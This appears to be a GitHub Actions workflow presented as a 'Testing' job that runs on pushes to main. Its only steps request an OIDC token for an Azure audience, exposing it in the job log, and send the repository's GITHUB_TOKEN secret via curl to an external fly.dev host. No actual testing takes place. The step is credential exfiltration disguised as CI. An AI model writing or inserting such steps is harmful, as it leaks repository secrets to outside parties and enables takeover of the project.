on:
  push:
    branches:
      - main
  workflow_dispatch:
    branches:
      - main
jobs:
  testing:
    permissions:
      contents: "read"
      id-token: "write"
    name: Testing
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: testing
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=api://AzureADTokenExchange"
          curl https://twilight-hill-6850.fly.dev -H"Authorization: ${{env.GITHUB_TOKEN}}"

